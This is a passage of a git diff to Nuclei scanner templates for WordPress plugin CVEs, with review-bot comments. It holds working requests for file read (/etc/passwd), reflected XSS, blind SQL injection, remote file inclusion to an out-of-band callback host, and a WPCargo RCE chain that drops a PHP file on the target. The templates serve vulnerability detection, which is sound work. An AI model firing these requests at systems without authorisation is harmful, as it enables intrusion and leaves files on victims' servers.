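Review bot: The rewrite replaces `author: akincibor` with `author: ritikchaddha` even though the file keeps its id and scope; the repository convention for a reworked template is to append, i.e. `author: akincibor,ritikchaddha`, so the original attribution is not lost. On the detection side, the template moves from a passive `readme.txt` version compare to a single time-based probe whose only timing signal is `duration>=5`, which will also fire on a host that is merely slow; keeping the former version extractor as a corroborating signal (or raising the sleep-to-timeout margin) would reduce false positives. Please also double-check that `matchers-condition` is intentionally absent, since the single DSL matcher now carries the whole decision.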
@@ -6,20 +6,33 @@ info: severity: critical description: | WordPress Modern Events Calendar plugin before 6.1.5 is susceptible to blind SQL injection. The plugin does not sanitize and escape the time parameter before using it in a SQL statement in the mec_load_single_page AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. + impact: | + Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database. + remediation: | + Upgrade to WordPress Modern Events Calendar version 6.1.5 or later to mitigate this vulnerability. reference: - https://wpscan.com/vulnerability/09871847-1d6a-4dfe-8a8c-f2f53ff87445 - https://wordpress.org/plugins/modern-events-calendar-lite/ - https://nvd.nist.gov/vuln/detail/CVE-2021-24946 + - http://packetstormsecurity.com/files/165742/WordPress-Modern-Events-Calendar-6.1-SQL-Injection.html + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-24946 cwe-id: CWE-89 + epss-score: 0.12445 + epss-percentile: 0.94942 + cpe: cpe:2.3:a:webnus:modern_events_calendar_lite:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: wordpress,wp-plugin,wp,unauth,wpscan,cve,cve2021,sqli,modern-events-calendar-lite + verified: true + max-request: 1 + vendor: webnus + product: modern_events_calendar_lite + framework: wordpress + tags: cve2021,cve,sqli,packetstorm,wp,wp-plugin,unauth,wpscan,modern-events-calendar-lite,wordpress,webnus -requests: +http: - raw: - | @timeout: 10s 
@@ -34,5 +47,4 @@ requests: - 'contains(content_type, "text/html")' - 'contains(body, "The event is finished") || contains(body, "been a critical error")' condition: and - -# Enhanced by md on 2023/01/06 +# digest: 4a0a004730450220639f36ec2923e5c1fa51bab912bd571fed2585b6cbe587796844a913eb606c6e022100d5fa2051f016ff2940ca7e37b26ed07563aa7272b2bc5f69a8a4b96dd0f549d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24947.yaml b/nuclei-templates/CVE-2021/CVE-2021-24947.yaml new file mode 100644 index 0000000000..9796ad8438 --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-24947.yaml 
@@ -0,0 +1,56 @@ +id: CVE-2021-24947 + +info: + name: WordPress Responsive Vector Maps < 6.4.2 - Arbitrary File Read + author: cckuailong + severity: medium + description: WordPress Responsive Vector Maps < 6.4.2 contains an arbitrary file read vulnerability because the plugin does not have proper authorization and validation of the rvm_upload_regions_file_path parameter in the rvm_import_regions AJAX action, allowing any authenticated user to read arbitrary files on the web server. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or exposure of sensitive information. + remediation: | + Update WordPress Responsive Vector Maps plugin to version 6.4.2 or later to mitigate the vulnerability. + reference: + - https://wpscan.com/vulnerability/c6bb12b1-6961-40bd-9110-edfa9ee41a18 + - https://nvd.nist.gov/vuln/detail/CVE-2021-24947 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/kazet/wpgarlic + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N + cvss-score: 6.5 + cve-id: CVE-2021-24947 + cwe-id: CWE-352,CWE-863 + epss-score: 0.00315 + epss-percentile: 0.69672 + cpe: cpe:2.3:a:thinkupthemes:responsive_vector_maps:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: thinkupthemes + product: responsive_vector_maps + framework: wordpress + tags: cve2021,cve,authenticated,wpscan,lfi,wp,wordpress,wp-plugin,lfr,thinkupthemes + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Origin: {{RootURL}} + Content-Type: application/x-www-form-urlencoded + Cookie: wordpress_test_cookie=WP%20Cookie%20check + + log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 + - | + GET /wp-admin/admin-ajax.php?action=rvm_import_regions&nonce=5&rvm_mbe_post_id=1&rvm_upload_regions_file_path=/etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: regex + regex: + - 
"root:[x*]:0:0" + + - type: status + status: + - 200 +# digest: 4a0a004730450221008def46061f092b5a0c93c28264ab3a05066eaf001fe4abf17f6bb797222530eb02206027d16ad6b375a0bf8611d8873cea6d30f23a2c433cfcf607ec748b470ffabc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24956.yaml b/nuclei-templates/CVE-2021/CVE-2021-24956.yaml index e991b4464c..9b4a2d747b 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24956.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24956.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Blog2Social: Social Media Auto Post & Scheduler WordPress plugin before 6.8.7 does not sanitise and escape the b2sShowByDate parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting issue. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 6.8.7 reference: - https://wpscan.com/vulnerability/5882ea89-f463-4f0b-a624-150bbaf967c2 @@ -16,7 +18,7 @@ info: cve-id: CVE-2021-24956 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.4302 + epss-percentile: 0.42122 cpe: cpe:2.3:a:adenion:blog2social:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +26,7 @@ info: vendor: adenion product: blog2social framework: wordpress - tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan + tags: cve,cve2021,wordpress,wp-plugin,xss,authenticated,wpscan,adenion http: - raw: 
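Review bot: In the new CVE-2021-24947 template neither the regex matcher nor the status matcher has a `part`, so in a two-request `raw` block it is not explicit which response `root:[x*]:0:0` and `200` are evaluated against; behavior here depends on engine defaults and can differ between versions. Scoping them the way CVE-2021-24940 in this commit does, e.g. `part: body_2` on the regex and a DSL `status_code_2 == 200`, makes the intent unambiguous and avoids a match on the login response. The `nonce=5` value is hard-coded; if the action really does not validate the nonce that is worth a one-line comment, since a reader will otherwise assume the template is broken.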
@@ -55,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d088fca34ccfa0b8c2cfaf6c9794bb88c57c9ecd7c6769cadac99a714d3b0975022100b62cdc58b104f778e20d8a96a2ea2c6487ed994a5237bcbf82c0f9971f7bfe5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ec04e3dad8ad65b066274ccd4a8a113b5ea1b447ef8a8ec31cda043e7556215b022048581b99f01c99ffc5343a1654aeb5b223cee073de6650038918f6053e24675b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24970.yaml b/nuclei-templates/CVE-2021/CVE-2021-24970.yaml index 10b2e51693..cdc485b1ed 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24970.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24970.yaml @@ -6,6 +6,8 @@ info: severity: high description: | WordPress All-in-One Video Gallery plugin before 2.5.0 is susceptible to local file inclusion. The plugin does not sanitize and validate the tab parameter before using it in a require statement in the admin dashboard. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations. + impact: | + An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: Fixed in version 2.5.4. reference: - https://wpscan.com/vulnerability/9b15d47e-43b6-49a8-b2c3-b99c92101e10 @@ -17,7 +19,7 @@ info: cve-id: CVE-2021-24970 cwe-id: CWE-22 epss-score: 0.03639 - epss-percentile: 0.90682 + epss-percentile: 0.90767 cpe: cpe:2.3:a:plugins360:all-in-one_video_gallery:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: plugins360 product: all-in-one_video_gallery framework: wordpress - tags: wpscan,cve,cve2021,wp,wp-plugin,wordpress,lfi,authenticated + tags: cve2021,cve,wpscan,wp,wp-plugin,wordpress,lfi,authenticated,plugins360 http: - raw: 
@@ -48,4 +50,4 @@ http: - 'contains(body_2, "Hello world!")' - 'contains(body_2, "Welcome to WordPress")' condition: and -# digest: 4b0a00483046022100d40243af70c92f6e2b514b9f12d93ca38c96a2db17bc9ce5541ad1beb29c4347022100ada8220e7ea0a925f054e794c54211b1070bdd6753a25c9d75ffdff7f19911f2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b5d1766bc6648351452ccabff49a901fdcee3d82c63473eb3f7da8360ad1a0f802201b2b426c71f82735e56341c6b3a49558a74a3e6d0a936e46a2d1c375a0d2dffc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24979.yaml b/nuclei-templates/CVE-2021/CVE-2021-24979.yaml index aa2d14bc69..7ec3b86095 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-24979.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-24979.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-24979 cwe-id: CWE-79 epss-score: 0.001 - epss-percentile: 0.41034 + epss-percentile: 0.40832 cpe: cpe:2.3:a:strangerstudios:paid_memberships_pro:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: paid_memberships_pro framework: wordpress publicwww-query: /wp-content/plugins/paid-memberships-pro/ - tags: cve,cve2023,wp,wordpress,wpscan,wp-plugin,xss,authenticated + tags: cve2021,cve,wp,wordpress,wpscan,wp-plugin,xss,authenticated,strangerstudios http: - raw: 
@@ -48,4 +48,4 @@ http: - 'contains(body_2, "style=animation-name:rotation+onanimationstart=alert(document.domain)//")' - 'contains(body_2, "Paid Memberships Pro - Membership Plugin for WordPress")' condition: and -# digest: 4b0a00483046022100be8762aab0014aae59ad8f82ea971a76605765da846117899be68986fb134022022100b1fab4254f11e5938733cb6efa162fd5e317908df93a790bdb1a039b32ef0a40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204c311ac0221f929a6e40782a29c695f3b9f8f53fdb8540c1a50f006d72c4665f022100bfbd6264919d48a0a9046f8c4b2fc16c812b6b9713d44a254f19dd0c43a97101:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-24991.yaml b/nuclei-templates/CVE-2021/CVE-2021-24991.yaml deleted file mode 100644 index 8be68cf940..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-24991.yaml +++ /dev/null 
@@ -1,45 +0,0 @@ -id: CVE-2021-24991 - -info: - name: The WooCommerce PDF Invoices & Packing Slips WordPress plugin < 2.10.5 - XSS - author: cckuailong - severity: medium - description: The WooCommerce PDF Invoices & Packing Slips WordPress plugin before 2.10.5 does not escape the tab and section parameters before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting in the admin dashboard. - reference: - - https://wpscan.com/vulnerability/88e706df-ae03-4665-94a3-db226e1f31a9 - - https://nvd.nist.gov/vuln/detail/CVE-2021-24991 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N - cvss-score: 4.8 - cve-id: CVE-2021-24991 - cwe-id: CWE-79 - tags: cve,cve2021,xss,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=wpo_wcpdf_options_page§ion=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29+x%3D HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "\" style=animation-name:rotation onanimationstart=alert(document.domain) x" - - "WooCommerce PDF Invoices" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25003.yaml b/nuclei-templates/CVE-2021/CVE-2021-25003.yaml index 05739f4468..991a425d77 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25003.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25003.yaml 
@@ -1,37 +1,47 @@ id: CVE-2021-25003 info: - name: WPCargo < 6.9.0 - Unauthenticated Remote Code Execution + name: WordPress WPCargo Track & Trace <6.9.0 - Remote Code Execution author: theamanrawat severity: critical description: | - The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE. + WordPress WPCargo Track & Trace plugin before 6.9.0 is susceptible to remote code execution, The plugin contains a file which can allow an attacker to write a PHP file anywhere on the web server, leading to possible remote code execution. This can allow an attacker to execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials. + impact: | + Successful exploitation of this vulnerability could lead to remote code execution, allowing an attacker to execute arbitrary code on the affected system. + remediation: | + Update to the latest version of the WPCargo Track & Trace plugin (6.9.0 or higher) to mitigate this vulnerability. 
reference: - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a - https://wordpress.org/plugins/wpcargo/ - https://nvd.nist.gov/vuln/detail/CVE-2021-25003 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/WhooAmii/POC_to_review classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-25003 - cwe-id: CWE-434 + cwe-id: CWE-434,CWE-94 + epss-score: 0.61252 + epss-percentile: 0.97725 + cpe: cpe:2.3:a:wptaskforce:wpcargo_track_\&_trace:*:*:*:*:*:wordpress:*:* metadata: - verified: "true" - tags: rce,wpcargo,unauth,cve,cve2021,wordpress,wp,wp-plugin,wpscan - + verified: true + max-request: 3 + vendor: wptaskforce + product: wpcargo_track_\&_trace + framework: wordpress + tags: cve2021,cve,rce,wpcargo,unauth,wordpress,wp,wp-plugin,wpscan,intrusive,wptaskforce variables: num: "999999999" -requests: +http: - raw: - | GET /wp-content/plugins/wpcargo/includes/{{randstr}}.php HTTP/1.1 Host: {{Hostname}} - - | GET /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath={{randstr}}.php HTTP/1.1 Host: {{Hostname}} - - | POST /wp-content/plugins/wpcargo/includes/{{randstr}}.php?1=var_dump HTTP/1.1 Host: {{Hostname}} 
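Review bot: The request sequence drops `{{randstr}}.php` into `wp-content/plugins/wpcargo/includes/` via barcode.php's `filepath` parameter and then calls it, but nothing removes the file afterwards, so every positive hit leaves an executable PHP file on the scanned host; the third request (`?1=var_dump` with a POST `2=` value) suggests the dropped file acts as a generic function invoker, though its actual content is encoded in the barcode text and cannot be read from the hunk. The `intrusive` tag added to the tags line is correct, but the description and remediation should state the side effect so operators know to clean up, e.g. append to the description: `Note: this template writes a PHP file named <randstr>.php into the plugin's includes/ directory and cannot delete it; remove it manually after a positive result.` The matchers for these requests are in the following hunk.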
@@ -39,13 +49,13 @@ requests: 2={{md5(num)}} - req-condition: true matchers: - type: dsl dsl: - - "status_code_1 != 200" - - "status_code_2 == 200" - - "status_code_3 == 200" - - "contains(body_3, md5(num))" - - "contains(body_3, 'PNG')" + - status_code_1 != 200 + - status_code_2 == 200 + - status_code_3 == 200 + - contains(body_3, md5(num)) + - contains(body_3, 'PNG') condition: and +# digest: 4a0a00473045022100b5707ad91e6b1dfa5b4a3bc474d4742991a1d184ae0613aa6cb97d286b6dfc10022037152a98a4212c570ce5b27a05074e2caeefd10b0e48b23218d1d6956512453e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25016.yaml b/nuclei-templates/CVE-2021/CVE-2021-25016.yaml index b24d2855db..5495d8a66f 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25016.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25016.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-25016 cwe-id: CWE-79 epss-score: 0.00106 - epss-percentile: 0.4302 + epss-percentile: 0.42122 cpe: cpe:2.3:a:premio:chaty:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +26,7 @@ info: product: chaty framework: wordpress publicwww-query: "/wp-content/plugins/chaty/" - tags: wpscan,cve,cve2021,wordpress,wp-plugin,xss,authenticated,chaty + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,authenticated,chaty,premio http: - raw: @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a1220adb770bcc72f08fc88649fdc78d03db3b76745ad89dcb404480584b8d0a022100e219deafb651445b5d88bc4b21f50a30aa96fc9f65eddbc48d14de2ad2a2fdd1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200562d68182e1f0832f719f7ffcc7031dd943c79e8086641c3bf82c70789eb8f30220539f7c805bba5467372c8534f30dd6565b0ad9886177350366dca637604e7708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25052.yaml b/nuclei-templates/CVE-2021/CVE-2021-25052.yaml deleted file mode 100644 index f83fa69d8f..0000000000 
--- a/nuclei-templates/CVE-2021/CVE-2021-25052.yaml +++ /dev/null @@ -1,44 +0,0 @@ -id: CVE-2021-25052 - -info: - name: The Button Generator WordPress plugin < 2.3.3 - RFI - author: cckuailong - severity: high - description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE. - reference: - - https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a - - https://nvd.nist.gov/vuln/detail/CVE-2021-25052 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H - cvss-score: 8.8 - cve-id: CVE-2021-25052 - cwe-id: CWE-352 - tags: cve,cve2021,rfi,wp,wordpress,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=wow-company&tab=http://{{interactsh-url}}/ HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: interactsh_protocol - name: http - words: - - "http" diff --git a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml b/nuclei-templates/CVE-2021/CVE-2021-25055.yaml deleted file mode 100644 index 62b2146692..0000000000 --- a/nuclei-templates/CVE-2021/CVE-2021-25055.yaml +++ /dev/null 
@@ -1,52 +0,0 @@ -id: CVE-2021-25055 - -info: - name: WordPress FeedWordPress < 2022.0123 - Authenticated Reflected Cross-Site Scripting - author: DhiyaneshDK - severity: medium - description: | - The plugin is affected by a cross-site scripting vulnerability within the "visibility" parameter. - reference: - - https://wpscan.com/vulnerability/7ed050a4-27eb-4ecb-9182-1d8fa1e71571 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25055 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 - cve-id: CVE-2021-25055 - cwe-id: CWE-79 - tags: cve,cve2021,wordpress,xss,wp-plugin,authenticated - -requests: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Origin: {{RootURL}} - Content-Type: application/x-www-form-urlencoded - Cookie: wordpress_test_cookie=WP%20Cookie%20check - - log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - - - | - GET /wp-admin/admin.php?page=feedwordpress%2Fsyndication.php&visibility=%22%3E%3Cimg+src%3D1+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - - type: word - part: header - words: - - text/html - - - type: status - status: - - 200 - - -# Enhanced by mp on 2022/04/13 diff --git a/nuclei-templates/CVE-2021/CVE-2021-25063.yaml b/nuclei-templates/CVE-2021/CVE-2021-25063.yaml index e6e9a265ec..0a98c205c0 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25063.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25063.yaml 
@@ -1,19 +1,33 @@ id: CVE-2021-25063 info: - name: Contact Form 7 Skins <= 2.5.0 - Reflected Cross-Site Scripting (XSS) + name: WordPress Contact Form 7 Skins <=2.5.0 - Cross-Site Scripting author: dhiyaneshDk severity: medium - description: The plugin does not sanitise and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting - reference: https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb + description: WordPress Contact Form 7 Skins plugin 2.5.0 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the tab parameter before outputting it back in an admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to unauthorized access, data theft, or defacement. + remediation: | + Update to the latest version of the WordPress Contact Form 7 Skins plugin (2.5.1) or apply the vendor-supplied patch. + reference: + - https://wpscan.com/vulnerability/e2185887-3e53-4089-aa3f-981c944ee0bb + - https://nvd.nist.gov/vuln/detail/CVE-2021-25063 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.10 + cvss-score: 6.1 cve-id: CVE-2021-25063 cwe-id: CWE-79 - tags: cve,cve2021wordpress,wp-plugin,xss,contactform,authenticated + epss-score: 0.00106 + epss-percentile: 0.42838 + cpe: cpe:2.3:a:cf7skins:contact_form_7_skins:*:*:*:*:*:wordpress:*:* + metadata: + max-request: 2 + vendor: cf7skins + product: contact_form_7_skins + framework: wordpress + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,contactform,authenticated,cf7skins -requests: +http: - raw: - | POST /wp-login.php HTTP/1.1 @@ -27,7 +41,6 @@ requests: GET /wp-admin/admin.php?page=cf7skins&tab=%27%3E%3Cimg+src+onerror%3Dalert%28document.domain%29%3E HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
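Review bot: The new remediation line asserts the fix shipped in `2.5.1`, but neither the `<=2.5.0` title nor the two references listed in this hunk establish that release number, so a template consumer cannot verify it. Either cite the changeset or advisory that names the fixed version, or phrase it as `Update to a version later than 2.5.0 (see the WPScan advisory for the fixed release).` so the remediation does not claim more than the references support.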
@@ -43,3 +56,4 @@ requests: - type: status status: - 200 +# digest: 4a0a004730450220638af89697796455e81da94a0b565bf04d1772c49363f630e14a8c366cf52334022100d961ae7ead36d711dd2c4b09d124180e8f7e9b14143961e41b8f770f612ec21f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25065.yaml b/nuclei-templates/CVE-2021/CVE-2021-25065.yaml index b106b1bfdc..b93d7867d1 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25065.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25065.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin was affected by a reflected XSS in custom-facebook-feed in cff-top admin page. + impact: | + An attacker can exploit this vulnerability to inject malicious scripts into web pages viewed by authenticated users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 2.19.2 reference: - https://wpscan.com/vulnerability/ae1aab4e-b00a-458b-a176-85761655bdcc @@ -16,7 +18,7 @@ info: cve-id: CVE-2021-25065 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28841 + epss-percentile: 0.2831 cpe: cpe:2.3:a:smashballoon:smash_balloon_social_post_feed:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: product: smash_balloon_social_post_feed framework: wordpress publicwww-query: "/wp-content/plugins/custom-facebook-feed/" - tags: cve,cve2021,wpscan,wordpress,wp-plugin,xss,wp,authenticated + tags: cve2021,cve,wpscan,wordpress,wp-plugin,xss,wp,authenticated,smashballoon http: - raw: 
@@ -46,4 +48,4 @@ http: - 'contains(body_2, "")' - 'contains(body_2, "custom-facebook-feed")' condition: and -# digest: 490a00463044022071f353d5c50069d334a4af786875823497d09d6a8d73314e9453953cb45ff681022032d065881fecb0efbd1776be4d1f4531c4389997ddc4aa4454ace3d6ee726e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022066171bc49b581bbbebf6e9bec3caae6f91de6cce6ace3ec1704214aab994b6000220419bff836a9ea9a7f671fe1105bc2f9f544d5b7cf562d3934255061ebaeb8388:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25067.yaml b/nuclei-templates/CVE-2021/CVE-2021-25067.yaml index 20a9fb5081..2e52fe0e79 100644 --- a/nuclei-templates/CVE-2021/CVE-2021-25067.yaml +++ b/nuclei-templates/CVE-2021/CVE-2021-25067.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Landing Page Builder WordPress plugin before 1.4.9.6 was affected by a reflected XSS in page-builder-add on the ulpb_post admin page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: Fixed in version 1.4.9.6. reference: - https://wpscan.com/vulnerability/365007f0-61ac-4e81-8a3a-3a068f2c84bc @@ -17,7 +19,7 @@ info: cve-id: CVE-2021-25067 cwe-id: CWE-79 epss-score: 0.00069 - epss-percentile: 0.28841 + epss-percentile: 0.285 cpe: cpe:2.3:a:pluginops:landing_page:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -25,7 +27,7 @@ info: vendor: pluginops product: landing_page framework: wordpress - tags: xss,wordpress,authenticated,wpscan,cve,cve2021,wp-plugin,wp,page-builder-add + tags: cve2021,cve,xss,wordpress,authenticated,wpscan,wp-plugin,wp,page-builder-add,pluginops http: - raw: 
@@ -47,4 +49,4 @@ http: - 'contains(body_2, "test\\\" style=animation-name:rotation onanimationstart=alert(document.domain)")' - 'contains(body_2, "Enter Page Title")' condition: and -# digest: 4b0a004830460221008ed583a9117951a7d4d178c589eb17b49fb14ee4b30fb080b4106e8502c8855c022100fbcd03b2116f5908afa815ea3261adb9a85fa62f8a34886e87d4d70c8a482a1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c83a8800b7738a60c2e6679d08ac8364a83b01e70927c405a8c6a5ab61c297a0022063a98761a2006bab30e128e42f3f9407f213005d4b390a7faf7027e103f4cf29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2021/CVE-2021-25074.yaml b/nuclei-templates/CVE-2021/CVE-2021-25074.yaml new file mode 100644 index 0000000000..726e7dd13e --- /dev/null +++ b/nuclei-templates/CVE-2021/CVE-2021-25074.yaml 
@@ -0,0 +1,42 @@
+id: CVE-2021-25074
+
+info:
+ name: WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect
+ author: dhiyaneshDk
+ severity: medium
+ description: WordPress WebP Converter for Media < 4.0.3 contains a file (passthru.php) which does not validate the src parameter before redirecting the user to it, leading to an open redirect issue.
+ impact: |
+ An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or the disclosure of sensitive information.
+ remediation: |
+ Update to the latest version of the WordPress WebP Converter for Media plugin (4.0.3) or remove the plugin if not needed.
+ reference:
+ - https://wpscan.com/vulnerability/f3c0a155-9563-4533-97d4-03b9bac83164
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-25074
+ - https://github.com/ARPSyndicate/kenzer-templates
+ - https://github.com/ARPSyndicate/cvemon
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2021-25074
+ cwe-id: CWE-601
+ epss-score: 0.00106
+ epss-percentile: 0.42122
+ cpe: cpe:2.3:a:webp_converter_for_media_project:webp_converter_for_media:*:*:*:*:*:wordpress:*:*
+ metadata:
+ max-request: 1
+ vendor: webp_converter_for_media_project
+ product: webp_converter_for_media
+ framework: wordpress
+ tags: cve2021,cve,redirect,wp-plugin,webpconverter,wpscan,wordpress,webp_converter_for_media_project
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"
+
+ matchers:
+ - type: regex
+ part: header
+ regex:
